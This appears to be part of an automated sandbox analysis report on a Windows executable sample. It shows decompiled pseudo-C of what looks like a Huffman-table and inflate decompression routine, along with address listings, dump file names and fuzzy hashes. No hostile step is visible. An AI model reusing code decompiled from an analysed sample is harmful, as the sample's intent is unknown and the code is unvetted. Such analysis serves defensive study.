															__edx = __edx - 1;
															__eflags = __edx;
														} while (__edx != 0);
														__esi[2] = __ecx;
														continue;
													}
													L87:
													__eflags = __ecx - 1;
													if(__ecx < 1) {
														goto L9;
													}
													L88:
													__edi =  *(__esi + 8 + __ecx * 4);
													goto L90;
												}
												L78:
												__ecx = __edx;
												__ebx = __ebx - __edx;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
												__ecx = __esi[2];
												 *(__esi + 0xc + __esi[2] * 4) = __eax;
												__esi[2] = __esi[2] + 1;
											}
											L94:
											__eax = __esi[1];
											__esi[0x144] = __esi[0x144] & 0x00000000;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
											__edi = __eax;
											__eax = __eax >> 5;
											__edi = __edi & 0x0000001f;
											__ecx = 0x101;
											__eax = __eax & 0x0000001f;
											__edi = __edi + 0x101;
											__eax = __eax + 1;
											__edx = __ebp - 0xc;
											 *(__ebp - 0x14) = __eax;
											 &(__esi[0x148]) = __ebp - 4;
											 *(__ebp - 4) = 9;
											__ebp - 0x18 =  &(__esi[3]);
											 *(__ebp - 0x10) = 6;
											__eax = E00406F54( &(__esi[3]), __edi, 0x101, 0x408414, 0x408454, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
											__eflags =  *(__ebp - 4);
											if( *(__ebp - 4) == 0) {
												__eax = __eax | 0xffffffff;
												__eflags = __eax;
											}
											__eflags = __eax;
											if(__eax != 0) {
												goto L9;
											} else {
												L97:
												__ebp - 0xc =  &(__esi[0x148]);
												__ebp - 0x10 = __ebp - 0x1c;
												__eax = __esi + 0xc + __edi * 4;
												__eax = E00406F54(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408494, 0x4084d0, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
												__eflags = __eax;
												if(__eax != 0) {
													goto L9;
												}
												L98:
												__eax =  *(__ebp - 0x10);
												__eflags =  *(__ebp - 0x10);
												if( *(__ebp - 0x10) != 0) {
													L100:
													__cl =  *(__ebp - 4);
													 *__esi =  *__esi & 0x00000000;
													__eflags =  *__esi;
													__esi[4] = __al;
													__eax =  *(__ebp - 0x18);
													__esi[5] =  *(__ebp - 0x18);
													__eax =  *(__ebp - 0x1c);
													__esi[4] = __cl;
													__esi[6] =  *(__ebp - 0x1c);
													goto L101;
												}
												L99:
												__eflags = __edi - 0x101;
												if(__edi > 0x101) {
													goto L9;
												}
												goto L100;
											}
										case 0xe:
											goto L9;
										case 0xf:
											L175:
											__eax =  *(__ebp - 0x30);
											__esi[0x26ea] =  *(__ebp - 0x30);
											__eax = E00406EEC( *((intOrPtr*)(__ebp + 8)));
											__ecx = __esi[0x26ea];
											__edx = __esi[0x26e9];
											__eflags = __ecx - __edx;
											 *(__ebp - 0x30) = __ecx;
											if(__ecx >= __edx) {
												__eax = __esi[0x26e8];
												__eax = __esi[0x26e8] - __ecx;
												__eflags = __eax;
											} else {
												__edx = __edx - __ecx;
												__eax = __edx - __ecx - 1;
											}
											__eflags = __ecx - __edx;
											 *(__ebp - 0x2c) = __eax;
											if(__ecx != __edx) {
												L183:
												__edi = 0;
												goto L10;
											} else {
												L179:
												__eax = __esi[0x145];
												__eflags = __eax - 8;
												 *__esi = __eax;
												if(__eax != 8) {
													L184:
													0 = 1;
													goto L10;
												}
												goto L180;
											}
									}
								}
								L181:
								goto L9;
							}
							L70:
							if( *__edi == __eax) {
								goto L72;
							}
							L71:
							__esi[2] = __esi[2] & __eax;
							 *__esi = 0xd;
							goto L93;
						}
					}
				}
				L182:
				_t443 = 0;
				_t446[0x147] =  *(_t448 - 0x40);
				_t446[0x146] = _t425;
				( *(_t448 + 8))[1] = 0;
				goto L11;
			}

0x0040677d
0x0040677d
0x0040677d
0x0040677d
0x0040677d
0x00406781
0x00000000
0x00000000
0x00406787
0x00406787
0x0040678a
0x0040678d
0x00406792
0x00406794
0x00406797
0x0040679a
0x0040679d
0x0040679d
0x004067a0
0x00000000
0x00000000
0x004067a2
0x004067a2
0x004067a5
0x004067aa
0x004067ac
0x004067af
0x004067b5
0x00406514
0x00406514
0x00406517
0x0040651d
0x00406523
0x0040652c
0x00406532
0x00406535
0x0040653c
0x00406541
0x00406547
0x00406552
0x00406552
0x004067bb
0x004067bb
0x004067c5
0x00000000
0x00000000
0x004067cb
0x004067cb
0x004067cf
0x004067d2
0x004067d2
0x004067d6
0x004067dc
0x004067dc
0x004067df
0x004067e2
0x004067e8
0x00000000
0x00000000
0x004067ea
0x0040680c
0x0040680c
0x0040680f
0x00000000
0x00000000
0x004067ec
0x004067f0
0x00000000
0x00000000
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00406801
0x00406803
0x00406806
0x00406809
0x00406809
0x00406811
0x00406811
0x00406817
0x0040681a
0x0040681d
0x0040681d
0x00406824
0x00406828
0x0040682c
0x0040682f
0x00406832
0x00406838
0x0040683d
0x00000000
0x00000000
0x0040683f
0x00406853
0x00406853
0x00406857
0x00000000
0x00000000
0x00406841
0x00406844
0x00406844
0x0040684b
0x00406850
0x00406850
0x00406850
0x00406859
0x00406859
0x0040685c
0x0040686a
0x00406870
0x00406875
0x0040687b
0x00406881
0x00406887
0x0040688e
0x004068a2
0x004068a2
0x00406e71
0x00406e71
0x00406e71
0x00406e76
0x00000000
0x00000000
0x004064ae
0x004064ae
0x00000000
0x00406aa9
0x00406aa9
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00000000
0x00000000
0x00406abc
0x00406abc
0x00406ae1
0x00406ae1
0x00406ae1
0x00406ae3
0x00000000
0x00000000
0x00406ac1
0x00406ac1
0x00406ac5
0x00000000
0x00000000
0x00406acb
0x00406acb
0x00406ace
0x00406ad1
0x00406ad4
0x00406ad6
0x00406ad8
0x00406adb
0x00406ade
0x00406ade
0x00406ade
0x00406ae5
0x00406ae5
0x00406aed
0x00406af0
0x00406af3
0x00406af6
0x00406afa
0x00406afd
0x00406aff
0x00406b02
0x00406b04
0x00406b18
0x00406b18
0x00406b1b
0x00406b35
0x00406b35
0x00406b38
0x00000000
0x00000000
0x00406b3e
0x00406b3e
0x00406b41
0x00000000
0x00000000
0x00406b47
0x00406b47
0x00000000
0x00406b47
0x00406b1d
0x00406b20
0x00406b27
0x00406b2a
0x00000000
0x00406b2a
0x00406b06
0x00406b0a
0x00406b0d
0x00000000
0x00000000
0x00406b52
0x00406b52
0x00406b77
0x00406b77
0x00406b77
0x00406b79
0x00000000
0x00000000
0x00406b57
0x00406b57
0x00406b5b
0x00000000
0x00000000
0x00406b61
0x00406b61
0x00406b64
0x00406b67
0x00406b6a
0x00406b6c
0x00406b6e
0x00406b71
0x00406b74
0x00406b74
0x00406b74
0x00406b7b
0x00406b83
0x00406b86
0x00406b89
0x00406b8b
0x00406b8e
0x00406b8e
0x00406b90
0x00406b94
0x00406b97
0x00406b9a
0x00406b9d
0x00000000
0x00000000
0x00406ba3
0x00406ba3
0x00406bc8
0x00406bc8
0x00406bc8
0x00406bca
0x00000000
0x00000000
0x00406ba8
0x00406ba8
0x00406bac
0x00000000
0x00000000
0x00406bb2
0x00406bb2
0x00406bb5
0x00406bb8
0x00406bbb
0x00406bbd
0x00406bbf
0x00406bc2
0x00406bc5
0x00406bc5
0x00406bc5
0x00406bcc
0x00406bcc
0x00406bd4
0x00406bd7
0x00406bda
0x00406bdd
0x00406be1
0x00406be4
0x00406be6
0x00406be9
0x00406bec
0x00406c06
0x00406c06
0x00406c09
0x00000000
0x00000000
0x00406c0f
0x00406c0f
0x00406c12
0x00406c19
0x00000000
0x00406c19
0x00406bee
0x00406bf1
0x00406bf8
0x00406bfb
0x00000000
0x00000000
0x00406c21
0x00406c21
0x00406c46
0x00406c46
0x00406c46
0x00406c48
0x00000000
0x00000000
0x00406c26
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c30
0x00406c33
0x00406c36
0x00406c39
0x00406c3b
0x00406c3d
0x00406c40
0x00406c43
0x00406c43
0x00406c43
0x00406c4a
0x00406c52
0x00406c55
0x00406c58
0x00406c5a
0x00406c5d
0x00406c5d
0x00406c5f
0x00000000
0x00000000
0x00406c65
0x00406c65
0x00406c68
0x00406c6d
0x00406c6f
0x00406c75
0x00406c77
0x00406c8c
0x00406c8e
0x00406c8e
0x00406c79
0x00406c7f
0x00406c81
0x00406c83
0x00406c83
0x00406c90
0x00406c94
0x00406c97
0x00406c9d
0x00406c9d
0x00406ca0
0x00406ca0
0x00406ca0
0x00406ca2
0x00000000
0x00000000
0x00406ca8
0x00406ca8
0x00406cae
0x00406cb0
0x00406cd5
0x00406cd8
0x00406cde
0x00406ce3
0x00406ce9
0x00406cef
0x00406cf1
0x00406cf4
0x00406cfd
0x00406d03
0x00406d03
0x00406cf6
0x00406cf8
0x00406cfa
0x00406cfa
0x00406d05
0x00406d0b
0x00406d0d
0x00406d10
0x00406d12
0x00406d18
0x00406d1a
0x00406d1c
0x00406d1e
0x00406d20
0x00406d23
0x00406d2c
0x00406d2f
0x00406d2f
0x00406d25
0x00406d25
0x00406d28
0x00406d28
0x00406d23
0x00406d1a
0x00406d31
0x00406d33
0x00000000
0x00000000
0x00000000
0x00000000
0x00406d33
0x00406cb2
0x00406cb2
0x00406cb8
0x00406cbe
0x00406cc0
0x00000000
0x00000000
0x00406cc2
0x00406cc2
0x00406cc4
0x00406cc6
0x00406ccf
0x00406ccf
0x00406cc8
0x00406cc8
0x00406ccb
0x00406ccb
0x00406cd1
0x00406cd3
0x00000000
0x00000000
0x00406d39
0x00406d39
0x00406d3e
0x00406d40
0x00406d41
0x00406d42
0x00406d43
0x00406d49
0x00406d4c
0x00406d4f
0x00406d52
0x00406d54
0x00406d5a
0x00406d5a
0x00406d5d
0x00406d5d
0x00406d5d
0x00406d5d
0x00406d66
0x00000000
0x00000000
0x00406d6b
0x00406d6b
0x00406d6e
0x00406d71
0x00406d73
0x00406e0a
0x00406e0a
0x00406e0d
0x00406e0f
0x00406e10
0x00406e11
0x00406e14
0x00000000
0x00406e14
0x00406d79
0x00406d79
0x00406d7f
0x00406d81
0x00406da6
0x00406da9
0x00406daf
0x00406db4
0x00406dba
0x00406dc0
0x00406dc2
0x00406dc5
0x00406dce
0x00406dd4
0x00406dd4
0x00406dc7
0x00406dc9
0x00406dcb
0x00406dcb
0x00406dd6
0x00406ddc
0x00406dde
0x00406de1
0x00406de3
0x00406de9
0x00406deb
0x00406ded
0x00406def
0x00406df1
0x00406df4
0x00406dfd
0x00406e00
0x00406e00
0x00406df6
0x00406df6
0x00406df9
0x00406df9
0x00406df4
0x00406deb
0x00406e02
0x00406e04
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e04
0x00406d83
0x00406d83
0x00406d89
0x00406d8f
0x00406d91
0x00000000
0x00000000
0x00406d93
0x00406d93
0x00406d95
0x00406d97
0x00406d9e
0x00406d9e
0x00406da0
0x00406d99
0x00406d99
0x00406d9b
0x00406d9b
0x00406da2
0x00406da4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406e1c
0x00406e1c
0x00406e1f
0x00406e21
0x00406e24
0x00406e27
0x00406e27
0x00406e27
0x00406e27
0x00000000
0x00000000
0x00000000
0x004064d5
0x004064b9
0x00000000
0x004064bf
0x004064c2
0x004064cc
0x004064cf
0x004064d2
0x00000000
0x004064d2
0x004064b9
0x004064dd
0x004064e0
0x004064e4
0x004064ee
0x004064f8
0x004064fb
0x00406501
0x00406635
0x00406637
0x0040663d
0x00406640
0x00406643
0x00000000
0x00406643
0x00406507
0x00406507
0x00406508
0x00406560
0x00406560
0x00406567
0x0040660d
0x0040660d
0x00406612
0x00406615
0x0040661a
0x0040661d
0x00406622
0x00406625
0x0040662a
0x0040662d
0x0040662d
0x00000000
0x0040656d
0x0040656d
0x0040656d
0x0040656d
0x00406571
0x00406571
0x00406593
0x00406596
0x00406598
0x0040659b
0x004065a0
0x00406576
0x00406576
0x0040657b
0x0040657d
0x0040657f
0x00406584
0x0040658a
0x0040658f
0x00406591
0x00406591
0x00406586
0x00406586
0x00406586
0x00406584
0x00000000
0x004065a2
0x004065cf
0x004065d4
0x004065d6
0x004065d7
0x004065d9
0x004065da
0x004065da
0x004065da
0x00406602
0x00406607
0x00406607
0x00000000
0x00406607
0x004065a0
0x00406567
0x0040650a
0x0040650a
0x0040650b
0x00406555
0x00000000
0x00406555
0x0040650d
0x0040650e
0x00000000
0x00000000
0x00000000
0x00000000
0x0040666a
0x0040666a
0x0040666a
0x0040666d
0x00000000
0x00000000
0x0040664a
0x0040664a
0x0040664e
0x00000000
0x00000000
0x00406654
0x00406654
0x00406657
0x0040665a
0x0040665f
0x00406661
0x00406664
0x00406667
0x00406667
0x00406667
0x0040666f
0x0040666f
0x00406672
0x00406674
0x00406679
0x0040667c
0x0040667e
0x00406681
0x00000000
0x00000000
0x00406687
0x00406687
0x00406689
0x00000000
0x00000000
0x0040668f
0x0040668f
0x00406693
0x00000000
0x00000000
0x00406699
0x00406699
0x0040669c
0x0040669e
0x0040673c
0x0040673c
0x0040673f
0x00406741
0x00406741
0x00406744
0x00406747
0x00406749
0x0040674b
0x0040674d
0x0040674d
0x00406756
0x0040675b
0x0040675e
0x00406761
0x00406764
0x00406767
0x00406767
0x00406767
0x0040676a
0x00406770
0x00406770
0x00406776
0x00406776
0x00406776
0x00000000
0x0040676a
0x004066a4
0x004066a4
0x004066aa
0x004066ad
0x004066af
0x004066da
0x004066dd
0x004066e3
0x004066e8
0x004066ee
0x004066f4
0x004066f6
0x004066f9
0x00406702
0x00406708
0x00406708
0x004066fb
0x004066fd
0x004066ff
0x004066ff
0x0040670a
0x00406710
0x00406713
0x00406715
0x00406717
0x0040671d
0x0040671f
0x00406721
0x00406724
0x0040672d
0x0040672d
0x0040672f
0x00406726
0x00406726
0x00406729
0x00406729
0x00406731
0x00406731
0x0040671f
0x00406734
0x00406736
0x00000000
0x00000000
0x00000000
0x00000000
0x00406736
0x004066b1
0x004066b1
0x004066b7
0x004066bd
0x004066bf
0x00000000
0x00000000
0x004066c1
0x004066c1
0x004066c3
0x004066c5
0x004066c8
0x004066cf
0x004066cf
0x004066d1
0x004066ca
0x004066ca
0x004066cc
0x004066cc
0x004066d3
0x004066d5
0x004066d8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004067dc
0x004067df
0x004067e2
0x004067e8
0x00000000
0x00000000
0x00000000
0x00000000
0x004069bf
0x004069bf
0x004069bf
0x004069c2
0x004069c5
0x004069c7
0x004069ca
0x004069d0
0x004069d7
0x004069d9
0x00000000
0x00000000
0x004068ad
0x004068ad
0x004068d5
0x004068d5
0x004068d5
0x004068d7
0x00000000
0x00000000
0x004068b5
0x004068b5
0x004068b9
0x00000000
0x00000000
0x004068bf
0x004068bf
0x004068c2
0x004068c5
0x004068c8
0x004068ca
0x004068cc
0x004068cf
0x004068d2
0x004068d2
0x004068d2
0x004068d9
0x004068d9
0x004068e1
0x004068e4
0x004068ea
0x004068ed
0x004068f1
0x004068f5
0x004068f8
0x004068fb
0x00406913
0x00406913
0x00406916
0x00406924
0x00406927
0x00406918
0x00406918
0x0040691a
0x00406921
0x00406921
0x00406950
0x00406950
0x00406950
0x00406953
0x00406955
0x00000000
0x00000000
0x00406930
0x00406930
0x00406934
0x00000000
0x00000000
0x0040693a
0x0040693a
0x0040693d
0x00406940
0x00406943
0x00406945
0x00406947
0x0040694a
0x0040694d
0x0040694d
0x0040694d
0x00406957
0x00406957
0x00406959
0x0040695b
0x00406966
0x00406969
0x0040696c
0x0040696e
0x00406970
0x00406972
0x00406975
0x00406978
0x0040697d
0x00406980
0x00406983
0x00406986
0x0040698d
0x00406990
0x00406992
0x00000000
0x00000000
0x00406998
0x00406998
0x0040699c
0x004069ad
0x004069ad
0x004069ad
0x004069af
0x004069af
0x004069b3
0x004069b3
0x004069b3
0x004069b5
0x004069b6
0x004069b9
0x004069b9
0x004069b9
0x004069bc
0x00000000
0x004069bc
0x0040699e
0x0040699e
0x004069a1
0x00000000
0x00000000
0x004069a7
0x004069a7
0x00000000
0x004069a7
0x004068fd
0x004068fd
0x004068ff
0x00406901
0x00406904
0x00406907
0x0040690b
0x0040690b
0x004069df
0x004069df
0x004069e2
0x004069e9
0x004069ed
0x004069ef
0x004069f2
0x004069f5
0x004069fa
0x004069fd
0x004069ff
0x00406a00
0x00406a03
0x00406a0e
0x00406a11
0x00406a28
0x00406a2d
0x00406a34
0x00406a39
0x00406a3d
0x00406a3f
0x00406a3f
0x00406a3f
0x00406a42
0x00406a44
0x00000000
0x00406a4a
0x00406a4a
0x00406a4e
0x00406a59
0x00406a6c
0x00406a71
0x00406a76
0x00406a78
0x00000000
0x00000000
0x00406a7e
0x00406a7e
0x00406a81
0x00406a83
0x00406a91
0x00406a91
0x00406a94
0x00406a94
0x00406a97
0x00406a9a
0x00406a9d
0x00406aa0
0x00406aa3
0x00406aa6
0x00000000
0x00406aa6
0x00406a85
0x00406a85
0x00406a8b
0x00000000
0x00000000
0x00000000
0x00406a8b
0x00000000
0x00000000
0x00000000
0x00406e2a
0x00406e2a
0x00406e30
0x00406e36
0x00406e3b
0x00406e41
0x00406e47
0x00406e49
0x00406e4c
0x00406e55
0x00406e5b
0x00406e5b
0x00406e4e
0x00406e50
0x00406e52
0x00406e52
0x00406e5d
0x00406e5f
0x00406e62
0x00406e9d
0x00406e9d
0x00000000
0x00406e64
0x00406e64
0x00406e64
0x00406e6a
0x00406e6d
0x00406e6f
0x00406ea4
0x00406ea6
0x00000000
0x00406ea6
0x00000000
0x00406e6f
0x00000000
0x004064ae
0x00406e7c
0x00000000
0x00406e7c
0x00406890
0x00406892
0x00000000
0x00000000
0x00406894
0x00406894
0x00406897
0x00000000
0x00406897
0x004067dc
0x0040679d
0x00406e81
0x00406e84
0x00406e86
0x00406e8f
0x00406e95
0x00000000

Memory Dump Source

Source File: 00000000.00000002.225918354.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225912813.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225926990.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225936254.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225965765.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225976172.0000000000435000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225997993.0000000000438000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
Instruction ID: c7d8350576d698755b4cacea6fe682166efb8a165fc05e4c5726b7f1812f50b8
Opcode Fuzzy Hash: 82a44bc8fd526afdff965e1cd5e7f2d0a246497ca5c27b0c944ad4ba04d420dd
Instruction Fuzzy Hash: F4E17971900706DFDB24CF58C880BAAB7F5FB44305F15842EE897A7291E738AA95CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406F54, Relevance: .3, Instructions: 300
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00406F54(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr* _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v116;
				signed int _v176;
				signed int _v180;
				signed int _v240;
				signed int _t166;
				signed int _t168;
				intOrPtr _t175;
				signed int _t181;
				void* _t182;
				intOrPtr _t183;
				signed int* _t184;
				signed int _t186;
				signed int _t187;
				signed int* _t189;
				signed int _t190;
				intOrPtr* _t191;
				intOrPtr _t192;
				signed int _t193;
				signed int _t195;
				signed int _t200;
				signed int _t205;
				void* _t207;
				short _t208;
				signed char _t222;
				signed int _t224;
				signed int _t225;
				signed int* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				signed int _t236;
				signed int _t244;
				signed int _t246;
				signed int _t251;
				signed int _t254;
				signed int _t256;
				signed int _t259;
				signed int _t262;
				void* _t263;
				void* _t264;
				signed int _t267;
				intOrPtr _t269;
				intOrPtr _t271;
				signed int _t274;
				intOrPtr* _t275;
				unsigned int _t276;
				void* _t277;
				signed int _t278;
				intOrPtr* _t279;
				signed int _t281;
				intOrPtr _t282;
				intOrPtr _t283;
				signed int* _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t296;
				signed int* _t297;
				intOrPtr _t298;
				void* _t299;

				_t278 = _a8;
				_t187 = 0x10;
				memset( &_v116, 0, _t187 << 2);
				_t189 = _a4;
				_t233 = _t278;
				do {
					_t166 =  *_t189;
					_t189 =  &(_t189[1]);
					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
					_t233 = _t233 - 1;
				} while (_t233 != 0);
				if(_v116 != _t278) {
					_t279 = _a28;
					_t267 =  *_t279;
					_t190 = 1;
					_a28 = _t267;
					_t234 = 0xf;
					while(1) {
						_t168 = 0;
						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
							break;
						}
						_t190 = _t190 + 1;
						if(_t190 <= _t234) {
							continue;
						}
						break;
					}
					_v8 = _t190;
					if(_t267 < _t190) {
						_a28 = _t190;
					}
					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
						_t234 = _t234 - 1;
						if(_t234 != 0) {
							continue;
						}
						break;
					}
					_v28 = _t234;
					if(_a28 > _t234) {
						_a28 = _t234;
					}
					 *_t279 = _a28;
					_t181 = 1 << _t190;
					while(_t190 < _t234) {
						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
						if(_t182 < 0) {
							L64:
							return _t168 | 0xffffffff;
						}
						_t190 = _t190 + 1;
						_t181 = _t182 + _t182;
					}
					_t281 = _t234 << 2;
					_t191 = _t299 + _t281 - 0x70;
					_t269 =  *_t191;
					_t183 = _t181 - _t269;
					_v52 = _t183;
					if(_t183 < 0) {
						goto L64;
					}
					_v176 = _t168;
					 *_t191 = _t269 + _t183;
					_t192 = 0;
					_t235 = _t234 - 1;
					if(_t235 == 0) {
						L21:
						_t184 = _a4;
						_t271 = 0;
						do {
							_t193 =  *_t184;
							_t184 =  &(_t184[1]);
							if(_t193 != _t168) {
								_t232 = _t299 + _t193 * 4 - 0xb0;
								_t236 =  *_t232;
								 *((intOrPtr*)(0x42d688 + _t236 * 4)) = _t271;
								 *_t232 = _t236 + 1;
							}
							_t271 = _t271 + 1;
						} while (_t271 < _a8);
						_v16 = _v16 | 0xffffffff;
						_v40 = _v40 & 0x00000000;
						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
						_t195 = _v8;
						_t186 =  ~_a28;
						_v12 = _t168;
						_v180 = _t168;
						_v36 = 0x42d688;
						_v240 = _t168;
						if(_t195 > _v28) {
							L62:
							_t168 = 0;
							if(_v52 == 0 || _v28 == 1) {
								return _t168;
							} else {
								goto L64;
							}
						}
						_v44 = _t195 - 1;
						_v32 = _t299 + _t195 * 4 - 0x70;
						do {
							_t282 =  *_v32;
							if(_t282 == 0) {
								goto L61;
							}
							while(1) {
								_t283 = _t282 - 1;
								_t200 = _a28 + _t186;
								_v48 = _t283;
								_v24 = _t200;
								if(_v8 <= _t200) {
									goto L45;
								}
								L31:
								_v20 = _t283 + 1;
								do {
									_v16 = _v16 + 1;
									_t296 = _v28 - _v24;
									if(_t296 > _a28) {
										_t296 = _a28;
									}
									_t222 = _v8 - _v24;
									_t254 = 1 << _t222;
									if(1 <= _v20) {
										L40:
										_t256 =  *_a36;
										_t168 = 1 << _t222;
										_v40 = 1;
										_t274 = _t256 + 1;
										if(_t274 > 0x5a0) {
											goto L64;
										}
									} else {
										_t275 = _v32;
										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
										if(_t222 >= _t296) {
											goto L40;
										}
										while(1) {
											_t222 = _t222 + 1;
											if(_t222 >= _t296) {
												goto L40;
											}
											_t275 = _t275 + 4;
											_t264 = _t263 + _t263;
											_t175 =  *_t275;
											if(_t264 <= _t175) {
												goto L40;
											}
											_t263 = _t264 - _t175;
										}
										goto L40;
									}
									_t168 = _a32 + _t256 * 4;
									_t297 = _t299 + _v16 * 4 - 0xec;
									 *_a36 = _t274;
									_t259 = _v16;
									 *_t297 = _t168;
									if(_t259 == 0) {
										 *_a24 = _t168;
									} else {
										_t276 = _v12;
										_t298 =  *((intOrPtr*)(_t297 - 4));
										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
										_a5 = _a28;
										_a4 = _t222;
										_t262 = _t276 >> _t186;
										_a6 = (_t168 - _t298 >> 2) - _t262;
										 *(_t298 + _t262 * 4) = _a4;
									}
									_t224 = _v24;
									_t186 = _t224;
									_t225 = _t224 + _a28;
									_v24 = _t225;
								} while (_v8 > _t225);
								L45:
								_t284 = _v36;
								_a5 = _v8 - _t186;
								if(_t284 < 0x42d688 + _a8 * 4) {
									_t205 =  *_t284;
									if(_t205 >= _a12) {
										_t207 = _t205 - _a12 + _t205 - _a12;
										_v36 =  &(_v36[1]);
										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
										_t208 =  *((intOrPtr*)(_t207 + _a16));
									} else {
										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
										_t208 =  *_t284;
										_v36 =  &(_t284[1]);
									}
									_a6 = _t208;
								} else {
									_a4 = 0xc0;
								}
								_t286 = 1 << _v8 - _t186;
								_t244 = _v12 >> _t186;
								while(_t244 < _v40) {
									 *(_t168 + _t244 * 4) = _a4;
									_t244 = _t244 + _t286;
								}
								_t287 = _v12;
								_t246 = 1 << _v44;
								while((_t287 & _t246) != 0) {
									_t287 = _t287 ^ _t246;
									_t246 = _t246 >> 1;
								}
								_t288 = _t287 ^ _t246;
								_v20 = 1;
								_v12 = _t288;
								_t251 = _v16;
								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
									L60:
									if(_v48 != 0) {
										_t282 = _v48;
										_t283 = _t282 - 1;
										_t200 = _a28 + _t186;
										_v48 = _t283;
										_v24 = _t200;
										if(_v8 <= _t200) {
											goto L45;
										}
										goto L31;
									}
									break;
								} else {
									goto L58;
								}
								do {
									L58:
									_t186 = _t186 - _a28;
									_t251 = _t251 - 1;
								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
								_v16 = _t251;
								goto L60;
							}
							L61:
							_v8 = _v8 + 1;
							_v32 = _v32 + 4;
							_v44 = _v44 + 1;
						} while (_v8 <= _v28);
						goto L62;
					}
					_t277 = 0;
					do {
						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
						_t277 = _t277 + 4;
						_t235 = _t235 - 1;
						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
					} while (_t235 != 0);
					goto L21;
				}
				 *_a24 =  *_a24 & 0x00000000;
				 *_a28 =  *_a28 & 0x00000000;
				return 0;
			}

0x00406f5f
0x00406f67
0x00406f6b
0x00406f6d
0x00406f70
0x00406f72
0x00406f72
0x00406f74
0x00406f7b
0x00406f7d
0x00406f7d
0x00406f83
0x00406f98
0x00406fa0
0x00406fa2
0x00406fa4
0x00406fa7
0x00406fa8
0x00406fa8
0x00406fae
0x00000000
0x00000000
0x00406fb0
0x00406fb3
0x00000000
0x00000000
0x00000000
0x00406fb3
0x00406fb7
0x00406fba
0x00406fbc
0x00406fbc
0x00406fbf
0x00406fc5
0x00406fc6
0x00000000
0x00000000
0x00000000
0x00406fc6
0x00406fcb
0x00406fce
0x00406fd0
0x00406fd0
0x00406fd6
0x00406fd8
0x00406fe9
0x00406fdc
0x00406fe0
0x00407285
0x00000000
0x00407285
0x00406fe6
0x00406fe7
0x00406fe7
0x00406fef
0x00406ff2
0x00406ff6
0x00406ff8
0x00406ffa
0x00406ffd
0x00000000
0x00000000
0x00407005
0x0040700b
0x0040700d
0x0040700f
0x00407010
0x00407025
0x00407025
0x00407028
0x0040702a
0x0040702a
0x0040702c
0x00407031
0x00407033
0x0040703a
0x0040703c
0x00407044
0x00407044
0x00407046
0x00407047
0x00407056
0x0040705a
0x0040705e
0x00407061
0x00407064
0x00407069
0x0040706c
0x00407072
0x00407079
0x0040707f
0x00407278
0x00407278
0x0040727d
0x0040728c
0x00000000
0x00000000
0x00000000
0x0040727d
0x0040708c
0x0040708f
0x00407092
0x00407095
0x00407099
0x00000000
0x00000000
0x004070a4
0x004070a7
0x004070a8
0x004070aa
0x004070b0
0x004070b3
0x00000000
0x00000000
0x004070b9
0x004070ba
0x004070bd
0x004070c0
0x004070c3
0x004070c9
0x004070cb
0x004070cb
0x004070d3
0x004070d7
0x004070dc
0x00407101
0x00407107
0x00407109
0x0040710b
0x0040710e
0x00407117
0x00000000
0x00000000
0x004070de
0x004070de
0x004070e7
0x004070eb
0x00000000
0x00000000
0x004070fc
0x004070fc
0x004070ff
0x00000000
0x00000000
0x004070ef
0x004070f2
0x004070f4
0x004070f8
0x00000000
0x00000000
0x004070fa
0x004070fa
0x00000000
0x004070fc
0x00407120
0x00407126
0x00407130
0x00407132
0x00407137
0x00407139
0x0040716f
0x0040713b
0x0040713b
0x0040713e
0x00407141
0x0040714b
0x0040714e
0x00407155
0x00407160
0x00407167
0x00407167
0x00407171
0x00407174
0x00407176
0x0040717c
0x0040717c
0x00407185
